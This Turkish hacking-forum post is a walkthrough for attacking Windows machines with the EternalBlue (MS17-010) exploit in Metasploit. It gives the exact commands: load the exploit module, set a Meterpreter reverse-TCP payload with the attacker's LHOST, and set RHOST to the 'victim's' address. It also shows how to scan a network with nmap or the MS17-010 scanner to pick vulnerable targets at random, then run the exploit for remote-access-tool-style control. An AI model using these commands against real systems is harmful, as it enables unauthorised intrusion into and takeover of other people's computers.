EternalBlue Ve Kullanımı//StringingStroke

StringingStroke

Katılımcı Üye
8 Ocak 2017
596
1
Bilinmiyor
Merhaba Dostlar!

Yeni bir konu ile karşınızdayım. Remote exploitler çok merak edilen bir konu ancak nasıl yapılacağı çok bilinmiyor.EternalBlue da o exploitlerden biri. Şimdi diyorsunuzki Remote exploit ne peki?
Remote Exploit: Adından da anlaşılacağı gibi uzak sistemlere yapılan Exploit türü diyebiliriz.
Exploit nedir bilmeyenler için bu linkten ulaşabilirsiniz.
EternalBlue, herkes tarafından bilinen Wannacry saldırısına sebep olan açıktır.
Bulunan sistemlerde açık muhakkak kapatılmalıdır kötü sonuçlar çıkabilir.
Evet peki bunu nasıl kullanırız diye soracaksınız.Öncelikle size ****sploit gerekli.Kali,Parrot,backtrack gibi işletim sistemlerinde zaten yüklü gelmektedir. ****sploit nedir ve kurulumu için yine Ceys komutanımızın bu konusundan inceleyebilirsiniz.
Konumuza geçelim...
Öncelikle terminalimize gelip msfconsole yazıyoruz ardından açılana kadar bekliyoruz.
lqG2dQ.png

Gelen ekrana
Kod:
use exploit/windows/smb/ms17_010_eternalblue
yazıyoruz.
V9n50B.png

Ardından eğer ki ratlardaki gibi kullanmak istiyorsanız şu komutu yazın.
Kod:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
nQ6VRN.png

Eğer shell olarak kullanmak istiyorsanız bunu yazmanıza gerek yok.
Eğer bu payloadu yazdıysanız ardından şu komutuda girmeniz gerekli
Kod:
set LHOST ipv4_adresiniz
v62dbA.png

Evet tekrar ikisininde birleştiği yerdeyiz.
Kurbanımızın ipv4 adresini biliyorsak
Kod:
set RHOST kurabnın ipv4_adresi
Llz7y0.png

eğer rastgele ağdan birini sçecekseniz veya ağdaki bilgisayarları görmek istiyorsanız farklı bir terminal açıp nmapin şu komutuyla bakabilirsiniz.
Kod:
nmap 192.168.1.0/24
Veya şu yöntemide deneyebilirsiniz:
İlk başta
Kod:
use auxiliary/scanner/smb/smb_ms17_010
16WmLB.png

diyip
Kod:
set RHOST IP_ARALIGI
Örneğin set RHOST 192.168.1.0/24
ardından run deyin.
burada beklerseniz açıklı ve açıksız makine olan ve olmayan makineleri söyleyecektir.
Ve yine RHOSTTAN sonraki yere kurbanınızı yazabilirsiniz.
Ardından exploit yazıp kurbanınızın düşmesini bekleyebilirsiniz ve aynı rat kurmuşcasına sistem üzerinde iş yapabilirsiniz.
r5kB3a.png

Bende açıklı makine olmadığından gösteremeyeceğim.Ancak devamında meterpreter ekranı açılacak ve rat şeklinde kullanabileceksiniz.
NOT:
Windows 8 exploiti ayrıdır onun için
Kod:
use exploit/windows/smb/ms17_010_eternalblue_win8
ile aynı şekilde kullanabilirsiniz.

 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.